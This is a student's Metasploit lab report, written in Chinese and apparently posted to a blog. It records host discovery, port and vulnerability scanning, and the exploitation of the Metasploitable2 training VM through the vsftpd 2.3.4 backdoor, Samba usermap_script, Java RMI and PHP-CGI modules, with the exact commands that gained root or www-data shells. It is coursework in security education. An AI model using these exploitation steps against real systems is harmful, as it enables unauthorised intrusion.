20232317 2025-2026-1 《网络与系统攻防技术》实验六实验报告

一、实验内容
掌握metasploit的用法。
下载官方靶机Metasploitable2,完成下面实验内容。

(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。

(2)攻击如下漏洞:
1.sftpd源码包后门漏洞(21端口)
2.SambaMS-RPC Shell命令注入漏洞(端口139)
3.Java RMI SERVER命令执行漏洞(1099端口)
4.PHP CGI参数执行注入漏洞(80端口)

二、实验过程
前期渗透
主机发现
查看靶机的IP地址
屏幕截图 2025-11-23 192604
在kali虚拟机中打开msfconsole,执行ARP扫描,命令如下:
search arp_sweep #ARP扫描的辅助模块
use 0 #使用arp_sweep模块
set RHOSTS 192.168.3.0/24 #指定扫描网段
run
屏幕截图 2025-11-23 193558

从扫描结果来看,靶机处于在线状态,且标识为VMware, Inc.,说明这是一台VMware虚拟机。
屏幕截图 2025-11-23 193645

端口扫描
使用nmap进行端口扫描,通过命令nmap -sS -sV 192.168.78.142进行SYN扫描并进行版本探测。根据nmap的扫描结果可以看出靶机上开放了大量的端口,同时存在有很多漏洞。
屏幕截图 2025-11-23 194023

在Metasploit中使用portscan/tcp扫描,同样能够扫描到靶机开放的端口。命令如下:
use auxiliary/scanner/portscan/tcp #TCP端口扫描模块
set RHOSTS 192.168.78.142 #设置目的IP
set THREADS 10 #并发线程,提升扫描速度
run
屏幕截图 2025-11-23 194709

漏洞扫描
通过nmap -script=vuln 192.168.78.142对靶机进行漏洞扫描。扫描结果发现靶机上存在大量漏洞。
屏幕截图 2025-11-23 195758

对于21端口的FTP服务存在vsFTPd 2.3.4版本后门漏洞(CVE-2011-2523),可直接获取root权限,属于高危漏洞。
屏幕截图 2025-11-23 200012

对于25端口的SMTP服务存在匿名Diffie-Hellman密钥交换漏洞和DHE_EXPORT降级漏洞。其中匿名Diffie-Hellman密钥交换漏洞会导致中间人攻击,破坏通信的机密性和完整性。DHE_EXPORT降级漏洞因为它支持TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA弱密码套件,使得攻击者可将加密强度降级至512位导致敏感信息泄露。
屏幕截图 2025-11-23 200049

对于80端口的HTTP服务存在敏感目录与文件暴露风险,Slowloris DoS漏洞和跨站请求伪造漏洞。
image
image

对于1099端口的远程方法调用服务也存在漏洞,RMI注册表的默认配置允许从远程URL加载类,可导致远程代码执行。
image

对于5432端口的PostgreSQL数据库存在Diffie-Hellman密钥交换强度不足,CCS注入漏洞以及POODLE漏洞。这些漏洞使得攻击者能够解密数据库通信,劫持TLS会话,最终解密数据。
image

对于6667端口的IRC服务存在UnrealIRCd后门。该漏洞使得攻击者可以直接获取系统权限。
image

Vsftpd源码包后门漏洞(21端口)
通过命令nmap -sV -p 21 192.168.78.142扫描靶机的21端口,查看该端口是否开启以及其上运行的服务与版本。
屏幕截图 2025-11-23 200414

使用Metasploit框架利用vsftpd 2.3.4版本后门漏洞。命令如下:
use exploit/unix/ftp/vsftpd_234_backdoor #利用vsftpd 2.3.4版本后门漏洞
set RHOSTS 192.168.78.142 #设置目的IP
run
利用vsftpd 2.3.4版本后门漏洞可以获得靶机的shell。能够查看当前路径以及目录中的文件,查看当前用户发现为root用户。
image

SambaMS-RPC Shell命令注入漏洞(端口139)
通过命令nmap -p 139 192.168.78.142扫描靶机的139端口,查看该端口是否开放。
屏幕截图 2025-11-23 202049
使用Metasploit框架利用Samba服务的usermap_script漏洞。命令如下:
use exploit/multi/samba/usermap_script #Samba服务的usermap_script漏洞
set RHOST 192.168.78.142 #设置目的IP
run
利用Samba服务的usermap_script漏洞可以获得靶机的shell。能够查看当前路径以及目录中的文件,查看当前用户发现为root用户。
屏幕截图 2025-11-23 202525

Java RMI SERVER命令执行漏洞(1099端口)
通过命令nmap -p 1099 192.168.78.142扫描靶机的1099端口,查看该端口是否开放。
屏幕截图 2025-11-23 201236
使用Metasploit框架利用Java RMI服务的远程代码执行漏洞。命令如下:
use exploit/multi/misc/java_rmi_server #Java RMI服务的远程代码执行漏洞
set RHOST 192.168.78.142 #设置目的IP
run
Java RMI服务的远程代码执行漏洞可以得到连接靶机的Meterpreter会话。输入shell后可以切换到交互式Shell中。此实能够查看目标主机的完整系统信息,当前路径以及目录中的文件。查看当前用户发现为root用户。
屏幕截图 2025-11-23 201858

PHP CGI参数执行注入漏洞(80端口)
通过命令nmap -p 80 192.168.78.142扫描靶机的80端口,查看该端口是否开放。
屏幕截图 2025-11-23 202634
使用Metasploit框架利用PHP-CGI的参数注入漏洞。命令如下:
use exploit/multi/http/php_cgi_arg_injection #PHP-CGI的参数注入漏洞
set RHOST 192.168.78.142 #设置目的IP
run
PHP-CGI的参数注入漏洞可以得到连接靶机的Meterpreter会话。输入shell后可以切换到交互式Shell中。此实能够查看目标主机的完整系统信息,当前路径以及目录中的文件。查看当前用户发现为www-data用户。
屏幕截图 2025-11-23 203127

三、问题与解决
问题一:进行ARP扫描时,提示用户权限不够
解决一:sudo su登录root用户

四、心得体会
本次实验学习了Metasploit攻击渗透,掌握主机发现、端口扫描、漏洞扫描流程,并通过msf框架完成部分端口漏洞利用,对该技术有了基础认知。实验推进顺利,靶机安装便捷,前期已配置好所需环境。不同端口攻击模块虽有差异,但均遵循统一逻辑,操作难度不大。值得反思的是,我常依赖教程完成任务,缺乏独立思考。后续需多钻研操作背后的原理。

posted @ 2025-11-23 21:14  20232317陈沐川  阅读(4)  评论(0)    收藏  举报